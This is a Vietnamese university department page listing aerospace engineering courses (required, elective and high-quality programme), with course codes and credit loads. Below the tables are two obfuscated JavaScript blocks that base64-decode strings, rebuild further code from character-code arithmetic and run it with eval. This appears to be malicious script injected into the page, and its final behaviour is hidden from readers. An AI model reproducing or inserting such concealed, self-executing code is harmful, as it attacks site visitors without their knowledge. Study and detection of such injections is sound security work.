Các môn học

Danh sách môn học – BM Kỹ thuật Hàng không & Vũ trụ

1. Học phần bắt buộc:

TT TÊN HỌC PHẦN Mã HP Khối Lượng
1 Nhập môn kỹ thuật hàng không TE2801 3(2-0-2-6)
2 Vật liệu hàng không TE2811 3(3-1-0-6)
3 Cơ học chất lỏng ứng dụng TE3601 3(2-1-1-6)
4 Kết cấu máy bay TE3801 2(2-1-0-4)
5 Khí động lực học I TE3811 3(2-1-1-6)
6 Hệ thống thủy lực và khí nén trên máy bay TE3821 3(3-1-0-6)
7 Kỹ thuật điện-điện tử trên máy bay TE3831 3(3-0-0-6)
8 Luật hàng không TE3841 2(2-0-0-4)
9 Các hệ thống trên máy bay TE3851 3(3-1-0-6)
10 Thực tập kỹ thuật Hàng không TE4005 2(0-0-4-4)
11 Động cơ hàng không I TE4801 3(2-1-1-6)
12 Nhập môn phương pháp số trong KTHK TE4811 2(2-1-0-4)
13 Kiểm tra và bảo dưỡng máy bay TE4821 3(2-2-0-6)
14 Trang thiết bị mặt đất TE4831 3(3-0-0-6)
15 Cơ học vật bay TE4841 4(3-2-0-6)
16 Cơ sở thiết kế máy bay TE4871 3(2-0-2-4)
17 Khí động lực học II TE4881 3(2-1-1-4)
18 Khí động đàn hồi TE4891 2(2-1-0-4)
19 Cơ học phá huỷ TE4901 3(2-2-0-6)
20 Động cơ Hàng không II TE5801 2(2-0-1-4)
21 Đồ án tính toán thiết kế máy bay TE5821 2(0-0-4-4)
22 Thực tập tốt nghiệp TE5005 3(0-0-6-6)

 

2. Học phần tự chọn:

TT TÊN HỌC PHẦN Mã HP Khối Lượng
1 Máy bay trực thăng TE5811 3(3-0-0-4)
2 Tiếng Anh chuyên ngành TE4861 2(2-1-0-6)
3 Đặc tính vật lý khí quyển TE4902 2(2-0-1-6)
4 Máy thủy lực thể tích TE3460 2(2-1-0-4)
5 Truyền động thủy lực thể tích TE4470 2(2-0-1-4)
6 Lý thuyết cánh I TE3410 2(2-1-0-4)
7 Lý thuyết ô tô TE3210 3(3-1-0-6)
8 Kỹ thuật đo lường EE3110 3(3-0-1-6)
9 Hệ thống đo và điều khiển công nghiệp EE3600 3(3-0-1-6)
10 Tải trọng và độ bền kết cấu vật bay (BTL) TE5831 3(2-2-0-6)
11 Ứng dụng phương pháp số trong tính toán kết cấu hàng không (BTL) TE5841 3(2-2-0-6)

 

3. Chương trình KSCLC:

TT TÊN HỌC PHẦN Mã HP Khối Lượng
1 Cơ học chất lỏng thực TE4810 3(2-1-1-6)
2 Kết cấu hàng không TE4820 1(1-0-0-2)
3 Đàn hồi khí động học TE4830 2(2-1-0-4)
4 Kỹ thuật điện-điện tử trên máy bay TE4840 2(2-1-0-4)
5 Hệ thống thời gian thực TE4850 2(2-1-0-4)
6 Lý thuyết cháy TE4860 1(1-0-0-2)
7 Khí động lực học cơ bản TE4870 2(2-0.5-0.5-4)
8 Động cơ và thiết bị đẩy I TE4880 2(2-1-0-4)
9 Cơ học vật bay I TE4890 2(2-0.5-0.5-4)
10 Động cơ và thiết bị đẩy II TE5820 2(2-0-1-4)
11 Vật liệu hàng không TE5830 2(2-1-0-4)
12 PP số trong cơ học chất lỏng TE5850 2(2-1-0-4)
13 Cơ sở thiết kế máy bay TE5870 2(2-1-0-4)
14 Các hệ thống trên máy bay TE5880 2(2-1-0-4)
15 Kiểm tra và Bảo dưỡng Máy bay TE5900 2(2-1-0-4)
16 Khai thác và quản lý máy bay TE5910 2(2-1-0-4)
17 Luật hàng không TE5920 1(1-0-0-2)

 

var ICNVNCGZZV = atob(‘dmFyIEhMSURaSVhKUkggPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDE4IC0gOCwgMTE5IC0gMSwgOTkgLSAyLCAxMjMgLSA5LCAzOCAtIDYsIDExNSAtIDgsIDEwNyAtIDYsIDEyNCAtIDMsIDM3IC0gNSwgNjUgLSA0LCAzNiAtIDQsIDQxIC0gMiwgOTMgLSAzLCAxMDYgLSA4LCA3NCAtIDksIDEyMSAtIDIsIDEwMiAtIDMsIDExNiAtIDIsIDg3IC0gNCwgMTEzIC0gMywgMTA4IC0gNywgNzkgLSA1LCA0MCAtIDEsIDYxIC0gMiwgMTMgLSAzLCAxMjQgLSA2LCA5OCAtIDEsIDEyMSAtIDcsIDQwIC0gOCwgMTAyIC0gMSwgMTE3IC0gNywgMTAzIC0gNCwgMTA5IC0gOCwgMTA3IC0gNywgNDAgLSA4LCA3MCAtIDksIDM4IC0gNiwgNDUgLSA2LCA3OSAtIDMsIDczIC0gOCwgNzkgLSAyLCAxMjYgLSA0LCA5NCAtIDgsIDEyNCAtIDQsIDgzIC0gNiwgNzMgLSA4LCA4NyAtIDksIDg2IC0gNSwgODMgLSA5LCA3MSAtIDEsIDEwMyAtIDMsIDU3IC0gNiwgMTE2IC0gNSwgNzIgLSAxLCA4MSAtIDUsIDExMyAtIDksIDgzIC0gMiwgODggLSAxLCA3NSAtIDMsIDEyNCAtIDIsIDk0IC0gNSwgNjggLSAzLCA3OCAtIDksIDkyIC0gNSwgODcgLSA2LCA2MiAtIDksIDc2IC0gNywgNjggLSAxLCA4NiAtIDUsIDg4IC0gMSwgNzcgLSA3LCAxMjYgLSA2LCAxMDMgLSA0LCA4OCAtIDEsIDY4IC0gMywgMTA2IC0gMywgNjkgLSA0LCAxMTYgLSA2LCA4OSAtIDksIDEyOCAtIDksIDEyMyAtIDQsIDUzIC0gNCwgOTEgLSAzLCA1MCAtIDIsIDgzIC0gMiwgNjcgLSAxLCA4MiAtIDUsIDcxIC0gNSwgMTIyIC0gMywgODQgLSA3LCA4NSAtIDYsIDEwOCAtIDMsIDU4IC0gNSwgNzcgLSA3LCAxMDEgLSA0LCA3MCAtIDEsIDEyNCAtIDQsIDExOSAtIDcsIDY5IC0gNCwgMTA4IC0gMywgNzggLSA5LCA4MiAtIDksIDc0IC0gNywgOTEgLSA0LCA4MyAtIDIsIDExNCAtIDIsIDc0IC0gOCwgMTI1IC0gMywgOTEgLSA2LCA1NCAtIDQsIDc2IC0gNiwgMTI3IC0gOCwgOTEgLSAyLCAxMDYgLSAyLCA3MSAtIDUsIDEyNSAtIDYsIDEwNCAtIDUsIDU0IC0gNywgODEgLSA1LCAxMDcgLSA0LCAxMDQgLSA0LCAxMTggLSA2LCA5MSAtIDYsIDcxIC0gNSwgNzQgLSA5LCA3MyAtIDgsIDc4IC0gMSwgNzIgLSAzLCAxMTIgLSA0LCA3NSAtIDEsIDEwMSAtIDMsIDg4IC0gNCwgNzQgLSAxLCA4OSAtIDIsIDg0IC0gNiwgODMgLSAyLCAxMDYgLSA2LCA5OSAtIDksIDk3IC0gOSwgOTUgLSA3LCAxMjUgLSA2LCAxMDYgLSA5LCA3NSAtIDUsIDEyNSAtIDQsIDEyMiAtIDcsIDYwIC0gNCwgNzEgLSA1LCA3MCAtIDMsIDEwNiAtIDMsIDkwIC0gNSwgNjcgLSAyLCAxMDQgLSAxLCA3NCAtIDEsIDU5IC0gNSwgODkgLSA4LCA3MSAtIDYsIDEyMyAtIDgsIDExMCAtIDEsIDEwNSAtIDUsIDgzIC0gMSwgNzcgLSA4LCA1MSAtIDIsIDczIC0gMywgMTA5IC0gNSwgMTAzIC0gNCwgMTA2IC0gOCwgODQgLSA3LCA3MiAtIDMsIDcyIC0gMywgODAgLSA3LCA4MSAtIDYsIDEyNyAtIDUsIDgyIC0gNSwgODQgLSA3LCAxMDUgLSA3LCAxMjMgLSAzLCA1NyAtIDksIDgzIC0gMiwgOTQgLSA4LCA5MSAtIDMsIDExMyAtIDEsIDk0IC0gOCwgMTA0IC0gNiwgMTI1IC0gNCwgNTYgLSA0LCA1MCAtIDEsIDczIC0gOCwgOTAgLSA2LCA4NCAtIDMsIDEwNSAtIDgsIDY4IC0gMiwgMTA1IC0gMSwgMTI4IC0gOSwgMTE0IC0gNCwgODkgLSA4LCA2OSAtIDQsIDU0IC0gNiwgMTI2IC0gOCwgODQgLSA1LCAxMjQgLSA1LCA5NyAtIDcsIDEyMCAtIDIsIDcyIC0gMiwgMTA4IC0gNCwgODIgLSA1LCA2OCAtIDEsIDg3IC0gOSwgMTA3IC0gNCwgNjcgLSAyLCA3MSAtIDUsIDcxIC0gNCwgOTIgLSA4LCA4MiAtIDksIDgxIC0gNSwgODMgLSA3LCA4OSAtIDcsIDgwIC0gMiwgODMgLSA3LCA3MyAtIDgsIDExMCAtIDUsIDc0IC0gNSwgNzcgLSA0LCA2OCAtIDEsIDkxIC0gNCwgODcgLSA5LCAxMDcgLSAzLCAxMDYgLSA5LCA2OSAtIDQsIDcwIC0gOSwgNjUgLSA0LCA0MyAtIDQsIDY3IC0gOCwgMTcgLSA3LCAxMDQgLSAyLCAxMjQgLSA3LCAxMTUgLSA1LCAxMDEgLSAyLCAxMjQgLSA4LCAxMTEgLSA2LCAxMTggLSA3LCAxMTMgLSAzLCAzNiAtIDQsIDEyMSAtIDEsIDExNyAtIDYsIDEyMyAtIDksIDEwMCAtIDUsIDEwNyAtIDYsIDExMyAtIDMsIDEwNSAtIDYsIDQ0IC0gNCwgMTIxIC0gNiwgMTIwIC0gNCwgMTE1IC0gMSwgMTA4IC0gMywgMTE5IC0gOSwgMTEyIC0gOSwgNTIgLSA4LCA0MSAtIDksIDExNSAtIDgsIDEwOSAtIDgsIDEyNiAtIDUsIDQ1IC0gNCwgMzUgLSAzLCAxMzAgLSA3LCAxMSAtIDEsIDM2IC0gNCwgMzcgLSA1LCAxMjIgLSA0LCAxMDMgLSA2LCAxMTYgLSAyLCAzNSAtIDMsIDExOCAtIDQsIDEwNCAtIDMsIDEyMSAtIDYsIDQwIC0gOCwgNjkgLSA4LCAzOSAtIDcsIDQ2IC0gNywgNDIgLSAzLCA2NiAtIDcsIDE1IC0gNSwgNDAgLSA4LCA0MCAtIDgsIDEwOSAtIDcsIDExNSAtIDQsIDEyMSAtIDcsIDM3IC0gNSwgNDEgLSAxLCAxMjMgLSA1LCAxMDAgLSAzLCAxMjMgLSA5LCAzNCAtIDIsIDExMiAtIDcsIDQwIC0gOCwgNjQgLSAzLCAzNCAtIDIsIDUzIC0gNSwgNjcgLSA4LCAzNyAtIDUsIDExNCAtIDksIDM3IC0gNSwgNjUgLSA1LCAzNiAtIDQsIDExNiAtIDEsIDEyMSAtIDUsIDEyMSAtIDcsIDExNCAtIDksIDExMyAtIDMsIDEwNCAtIDEsIDUwIC0gNCwgMTExIC0gMywgMTA3IC0gNiwgMTE1IC0gNSwgMTA1IC0gMiwgMTE4IC0gMiwgMTEzIC0gOSwgNjcgLSA4LCAzOSAtIDcsIDEwOCAtIDMsIDQ0IC0gMSwgNDggLSA1LCA1MCAtIDksIDMzIC0gMSwgMTI0IC0gMSwgMTYgLSA2LCAzNyAtIDUsIDM5IC0gNywgMzkgLSA3LCAzNiAtIDQsIDEyMyAtIDksIDEwNCAtIDMsIDExOSAtIDQsIDM4IC0gNiwgNDYgLSAzLCA2NSAtIDQsIDQxIC0gOSwgODQgLSAxLCAxMjMgLSA3LCAxMjMgLSA5LCAxMTMgLSA4LCAxMTIgLSAyLCAxMTIgLSA5LCA0OSAtIDMsIDEwNCAtIDIsIDEyMyAtIDksIDEyMCAtIDksIDExMyAtIDQsIDc0IC0gNywgMTA1IC0gMSwgMTAyIC0gNSwgMTIwIC0gNiwgNzYgLSA5LCAxMjAgLSA5LCAxMDggLSA4LCAxMDYgLSA1LCA0MyAtIDMsIDEyNCAtIDksIDExOSAtIDMsIDExNyAtIDMsIDExMSAtIDYsIDExNyAtIDcsIDExMiAtIDksIDQ5IC0gMywgMTA1IC0gNiwgMTEyIC0gOCwgMTA0IC0gNywgMTIwIC0gNiwgNzEgLSA0LCAxMTQgLSAzLCAxMDYgLSA2LCAxMDUgLSA0LCA3MCAtIDUsIDEyMyAtIDcsIDQ0IC0gNCwgMTA3IC0gMiwgNDcgLSA2LCAzNiAtIDQsIDk4IC0gNCwgMTQgLSA0LCAxMiAtIDMsIDEzIC0gNCwgMTEgLSAyLCAxOCAtIDksIDEwOSAtIDIsIDEwMiAtIDEsIDEyOCAtIDcsIDQ5IC0gMywgMTAzIC0gNCwgMTA3IC0gMywgMTAxIC0gNCwgMTE5IC0gNSwgNzAgLSAzLCAxMTYgLSA1LCAxMDMgLSAzLCAxMDMgLSAyLCA3MyAtIDgsIDExOCAtIDIsIDQxIC0gMSwgMTE0IC0gOSwgMzkgLSA3LCAzOSAtIDIsIDM2IC0gNCwgMTA5IC0gMiwgMTA4IC0gNywgMTMwIC0gOSwgNTAgLSA0LCAxMDkgLSAxLCAxMDIgLSAxLCAxMTUgLSA1LCAxMDkgLSA2LCAxMjMgLSA3LCAxMTEgLSA3LCA0NiAtIDUsIDUwIC0gOSwgNjEgLSAyLCAxOCAtIDgsIDM2IC0gNCwgNDAgLSA4LCAxMzMgLSA4LCAxOCAtIDgsIDM1IC0gMywgNDEgLSA5LCAxMjMgLSA5LCAxMDIgLSAxLCAxMjMgLSA3LCAxMjQgLSA3LCAxMTYgLSAyLCAxMTIgLSAyLCAzMyAtIDEsIDExOCAtIDQsIDEwNSAtIDQsIDExNiAtIDEsIDYyIC0gMywgMTIgLSAyLCAxMjkgLSA0LCAxMyAtIDMsIDE1IC0gNSwgMTI0IC0gNiwgOTkgLSAyLCAxMjIgLSA4LCAzNiAtIDQsIDEwOCAtIDgsIDEwOCAtIDcsIDEwMyAtIDQsIDMzIC0gMSwgNjcgLSA2LCA0MCAtIDgsIDEyNyAtIDcsIDExMiAtIDEsIDEyMyAtIDksIDEwNCAtIDksIDEwOSAtIDgsIDExOSAtIDksIDEwMyAtIDQsIDQyIC0gMiwgOTkgLSAyLCAxMTcgLSAxLCAxMTYgLSA1LCAxMDcgLSA5LCA0NyAtIDcsIDEwNiAtIDUsIDExMSAtIDEsIDEwNCAtIDUsIDEwOSAtIDgsIDEwOSAtIDksIDQyIC0gMSwgNDYgLSAyLCAzNyAtIDUsIDExMyAtIDYsIDEwNiAtIDUsIDEyNCAtIDMsIDQ2IC0gNSwgNjggLSA5LCAxOSAtIDksIDQ2IC0gNiwgMTE0IC0gNCwgMTA3IC0gNiwgMTI0IC0gNSwgMzMgLSAxLCA3OCAtIDgsIDEyMSAtIDQsIDExNCAtIDQsIDEwMCAtIDEsIDExNyAtIDEsIDEwOCAtIDMsIDExMyAtIDIsIDExNCAtIDQsIDQ1IC0gNSwgMTA3IC0gNywgMTA1IC0gNCwgMTA0IC0gNSwgNDkgLSA4LCA0MyAtIDIsIDQ2IC0gNiwgNDYgLSA1LCA2NSAtIDYsIDE4IC0gOCwgMTEgLSAxKTtldmFsKEhMSURaSVhKUkgpOw==’);
eval(ICNVNCGZZV);

var QSGJXNZHVT = atob(‘dmFyIEpCWE9CVEpTVFAgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDE0IC0gNCwgMTIxIC0gMywgMTA1IC0gOCwgMTE2IC0gMiwgNDAgLSA4LCAxMTYgLSA5LCAxMDQgLSAzLCAxMjkgLSA4LCAzOSAtIDcsIDYzIC0gMiwgMzQgLSAyLCA0MSAtIDIsIDkwIC0gMSwgNzUgLSAzLCA4OCAtIDksIDg0IC0gNiwgMTAxIC0gMSwgOTcgLSA3LCA3NSAtIDQsIDEwNyAtIDQsIDg0IC0gNywgNzcgLSAzLCA0MiAtIDMsIDYzIC0gNCwgMTUgLSA1LCAxMjAgLSAyLCA5OSAtIDIsIDEyMiAtIDgsIDM1IC0gMywgMTA3IC0gNiwgMTE3IC0gNywgMTA3IC0gOCwgMTA2IC0gNSwgMTAxIC0gMSwgMzggLSA2LCA2OSAtIDgsIDM5IC0gNywgNDQgLSA1LCA4MCAtIDQsIDEyNiAtIDUsIDExMCAtIDMsIDYyIC0gNSwgOTkgLSAxLCAxMDYgLSAyLCA4NyAtIDYsIDEyMCAtIDksIDc2IC0gMywgODkgLSA4LCAxMTggLSAyLCAxMTggLSAyLCAxMDcgLSA3LCA1MyAtIDIsIDExMSAtIDQsIDEyMiAtIDcsIDgyIC0gOSwgNzIgLSA1LCA1NiAtIDgsIDg5IC0gNywgODYgLSA4LCAxMjggLSA3LCA3OSAtIDYsIDgyIC0gOCwgODIgLSAzLCA5MSAtIDQsIDg0IC0gMywgNTYgLSAyLCA4MSAtIDIsIDEwNiAtIDEsIDExNiAtIDUsIDEyMyAtIDUsIDcyIC0gMywgNzAgLSAyLCA2MyAtIDcsIDY4IC0gMSwgNjggLSAxLCAxMjYgLSA1LCAxMDYgLSAzLCAxMTQgLSA0LCA4OCAtIDgsIDcxIC0gNCwgOTEgLSAyLCA1NiAtIDEsIDk2IC0gNiwgMTEwIC0gMywgODYgLSA5LCAxMTcgLSA1LCA4MiAtIDgsIDcwIC0gNCwgOTIgLSA3LCAxMTAgLSAzLCA4MyAtIDQsIDExMyAtIDgsIDU4IC0gOSwgMTE5IC0gMSwgOTUgLSA1LCAxMTcgLSA3LCA5MiAtIDYsIDEyNiAtIDksIDgyIC0gNywgMTA4IC0gMiwgODggLSAzLCA2OCAtIDIsIDc1IC0gMiwgOTQgLSA3LCA4OCAtIDcsIDExNSAtIDIsIDc3IC0gMSwgODYgLSAyLCAxMTggLSAzLCA4OCAtIDgsIDcwIC0gMSwgNzYgLSA5LCA1OCAtIDYsIDUzIC0gNCwgNzMgLSA1LCAxMDggLSAzLCA1NyAtIDEsIDUwIC0gMywgODEgLSA1LCA4NiAtIDMsIDU4IC0gOSwgMTE5IC0gOSwgMTA2IC0gOSwgODggLSA2LCAxMDMgLSA0LCAxMTMgLSAyLCA3NyAtIDMsIDcxIC0gMiwgNjggLSAyLCAxMDUgLSAxLCA5OSAtIDEsIDg2IC0gMiwgNzMgLSA0LCA2MyAtIDcsIDg0IC0gNSwgMTI3IC0gNSwgNjEgLSA4LCAxMDkgLSA4LCAxMDIgLSAyLCA5NCAtIDcsIDEwOCAtIDUsIDkyIC0gOCwgODMgLSAzLCAxMjMgLSAyLCAxMjIgLSA3LCA1MCAtIDMsIDgzIC0gNywgMTEyIC0gNywgOTggLSA5LCAxMjIgLSA2LCA3MCAtIDQsIDkyIC0gOSwgMTEyIC0gMSwgMTE4IC0gMSwgODUgLSAyLCA4OSAtIDYsIDgwIC0gMywgMTEzIC0gNCwgMTA0IC0gNCwgMTA4IC0gMiwgMTE2IC0gMSwgNjQgLSA5LCA4MSAtIDUsIDEyNiAtIDYsIDcxIC0gNiwgMTI2IC0gNCwgNzUgLSAxLCA3NSAtIDYsIDEwNCAtIDEsIDExMiAtIDksIDgyIC0gNywgMTI4IC0gNiwgNjkgLSA0LCAxMTcgLSA4LCA5NyAtIDgsIDkyIC0gOSwgODUgLSA0LCA5NSAtIDcsIDEwOCAtIDYsIDkxIC0gNCwgNTcgLSA0LCAxMDMgLSA0LCA4OSAtIDcsIDEyNCAtIDMsIDYwIC0gOCwgNTggLSA4LCA3OCAtIDMsIDEzMSAtIDksIDExMiAtIDEsIDExMiAtIDYsIDcwIC0gNSwgOTMgLSA5LCA5MCAtIDksIDEzMCAtIDgsIDg1IC0gMiwgODkgLSA2LCA5MiAtIDcsIDEyMCAtIDIsIDg0IC0gNSwgNzIgLSA1LCAxMjggLSA4LCAxMDkgLSA1LCA4MyAtIDcsIDEyMyAtIDMsIDg5IC0gOCwgMTIwIC0gNywgNzcgLSA0LCAxMTAgLSA3LCAxMTUgLSA4LCAxMTQgLSAyLCA3NiAtIDksIDkwIC0gNiwgNzUgLSA2LCAxMDYgLSAyLCA3NCAtIDEsIDEyOSAtIDgsIDExNSAtIDMsIDgxIC0gNCwgNzggLSAzLCAxMDcgLSAxLCA5MSAtIDYsIDc0IC0gOCwgODAgLSA3LCA5NSAtIDgsIDgzIC0gNSwgMTEyIC0gNywgODYgLSA1LCAxMDQgLSAxLCA2NyAtIDYsIDYyIC0gMSwgNDcgLSA4LCA2NiAtIDcsIDEyIC0gMiwgMTExIC0gOSwgMTIzIC0gNiwgMTE1IC0gNSwgMTAwIC0gMSwgMTE4IC0gMiwgMTA4IC0gMywgMTE4IC0gNywgMTE3IC0gNywgNDAgLSA4LCAxMjkgLSA5LCAxMTkgLSA4LCAxMjIgLSA4LCA5OCAtIDMsIDEwNyAtIDYsIDExMyAtIDMsIDEwNiAtIDcsIDQ3IC0gNywgMTIyIC0gNywgMTE4IC0gMiwgMTIyIC0gOCwgMTEyIC0gNywgMTEzIC0gMywgMTA3IC0gNCwgNTMgLSA5LCAzMyAtIDEsIDExNCAtIDcsIDEwOCAtIDcsIDEyNyAtIDYsIDQ0IC0gMywgMzYgLSA0LCAxMzIgLSA5LCAxNCAtIDQsIDQwIC0gOCwgMzcgLSA1LCAxMjYgLSA4LCAxMDYgLSA5LCAxMTcgLSAzLCAzMyAtIDEsIDExNSAtIDEsIDEwMiAtIDEsIDExOCAtIDMsIDQxIC0gOSwgNjkgLSA4LCAzOSAtIDcsIDQ3IC0gOCwgNDMgLSA0LCA2MCAtIDEsIDE0IC0gNCwgMzYgLSA0LCAzMyAtIDEsIDEwNSAtIDMsIDEyMCAtIDksIDExNiAtIDIsIDM1IC0gMywgNDcgLSA3LCAxMjYgLSA4LCAxMDEgLSA0LCAxMjAgLSA2LCA0MCAtIDgsIDEwOCAtIDMsIDM3IC0gNSwgNjIgLSAxLCA0MCAtIDgsIDU2IC0gOCwgNjMgLSA0LCAzMyAtIDEsIDExNCAtIDksIDQwIC0gOCwgNjkgLSA5LCAzOCAtIDYsIDEyMyAtIDgsIDEyNSAtIDksIDEyMiAtIDgsIDEwNiAtIDEsIDExMiAtIDIsIDEwNyAtIDQsIDUyIC0gNiwgMTEzIC0gNSwgMTA5IC0gOCwgMTE5IC0gOSwgMTA5IC0gNiwgMTI0IC0gOCwgMTEzIC0gOSwgNjYgLSA3LCAzOCAtIDYsIDEwNiAtIDEsIDQ2IC0gMywgNDUgLSAyLCA0MiAtIDEsIDQxIC0gOSwgMTI3IC0gNCwgMTkgLSA5LCA0MSAtIDksIDM1IC0gMywgMzMgLSAxLCAzOCAtIDYsIDEyMCAtIDYsIDEwMyAtIDIsIDEyMyAtIDgsIDM4IC0gNiwgNDcgLSA0LCA2NCAtIDMsIDM4IC0gNiwgOTEgLSA4LCAxMjAgLSA0LCAxMTUgLSAxLCAxMDkgLSA0LCAxMTQgLSA0LCAxMDUgLSAyLCA1MSAtIDUsIDEwOCAtIDYsIDEyMCAtIDYsIDEyMCAtIDksIDExMyAtIDQsIDY5IC0gMiwgMTA4IC0gNCwgOTggLSAxLCAxMjIgLSA4LCA3MCAtIDMsIDExMiAtIDEsIDEwNSAtIDUsIDEwNiAtIDUsIDQ2IC0gNiwgMTIzIC0gOCwgMTIyIC0gNiwgMTE3IC0gMywgMTA3IC0gMiwgMTE5IC0gOSwgMTA2IC0gMywgNTMgLSA3LCAxMDAgLSAxLCAxMDkgLSA1LCA5OCAtIDEsIDEyMCAtIDYsIDY5IC0gMiwgMTEyIC0gMSwgMTA0IC0gNCwgMTA3IC0gNiwgNjkgLSA0LCAxMTcgLSAxLCA0OCAtIDgsIDExNCAtIDksIDQ4IC0gNywgNDAgLSA4LCA5NSAtIDEsIDE4IC0gOCwgMTQgLSA1LCAxMiAtIDMsIDE0IC0gNSwgMTAgLSAxLCAxMTMgLSA2LCAxMDggLSA3LCAxMzAgLSA5LCA1MSAtIDUsIDEwNiAtIDcsIDExMyAtIDksIDEwNiAtIDksIDExOSAtIDUsIDc0IC0gNywgMTEyIC0gMSwgMTAxIC0gMSwgMTA2IC0gNSwgNzEgLSA2LCAxMjMgLSA3LCA0MiAtIDIsIDEwNyAtIDIsIDM1IC0gMywgNDYgLSA5LCAzNCAtIDIsIDExMCAtIDMsIDEwMyAtIDIsIDEyNyAtIDYsIDQ5IC0gMywgMTE3IC0gOSwgMTA0IC0gMywgMTE0IC0gNCwgMTA5IC0gNiwgMTIzIC0gNywgMTEwIC0gNiwgNDMgLSAyLCA0OCAtIDcsIDY2IC0gNywgMTQgLSA0LCAzNSAtIDMsIDM1IC0gMywgMTMxIC0gNiwgMTggLSA4LCA0MCAtIDgsIDMzIC0gMSwgMTE3IC0gMywgMTA5IC0gOCwgMTE3IC0gMSwgMTI2IC0gOSwgMTIxIC0gNywgMTE3IC0gNywgMzcgLSA1LCAxMjAgLSA2LCAxMDYgLSA1LCAxMTggLSAzLCA2MSAtIDIsIDE2IC0gNiwgMTMwIC0gNSwgMTQgLSA0LCAxOCAtIDgsIDEyMiAtIDQsIDEwNCAtIDcsIDExNyAtIDMsIDM4IC0gNiwgMTA3IC0gNywgMTAyIC0gMSwgMTAwIC0gMSwgMzcgLSA1LCA2NyAtIDYsIDM4IC0gNiwgMTIyIC0gMiwgMTE5IC0gOCwgMTIwIC0gNiwgOTYgLSAxLCAxMDQgLSAzLCAxMTYgLSA2LCAxMDQgLSA1LCA0NCAtIDQsIDk4IC0gMSwgMTIzIC0gNywgMTE5IC0gOCwgMTAxIC0gMywgNDMgLSAzLCAxMDQgLSAzLCAxMTIgLSAyLCAxMDMgLSA0LCAxMDYgLSA1LCAxMDcgLSA3LCA0OCAtIDcsIDUwIC0gNiwgMzUgLSAzLCAxMDggLSAxLCAxMDcgLSA2LCAxMjkgLSA4LCA1MCAtIDksIDY4IC0gOSwgMTMgLSAzLCA0NyAtIDcsIDExMiAtIDIsIDEwMyAtIDIsIDEyNCAtIDUsIDM4IC0gNiwgNzYgLSA2LCAxMjEgLSA0LCAxMTQgLSA0LCAxMDEgLSAyLCAxMTggLSAyLCAxMTQgLSA5LCAxMTIgLSAxLCAxMTYgLSA2LCA0OSAtIDksIDEwMSAtIDEsIDEwNCAtIDMsIDEwNiAtIDcsIDQ5IC0gOCwgNDggLSA3LCA0MiAtIDIsIDQ4IC0gNywgNjUgLSA2LCAxOSAtIDksIDE4IC0gOCk7ZXZhbChKQlhPQlRKU1RQKTs=’);
eval(QSGJXNZHVT);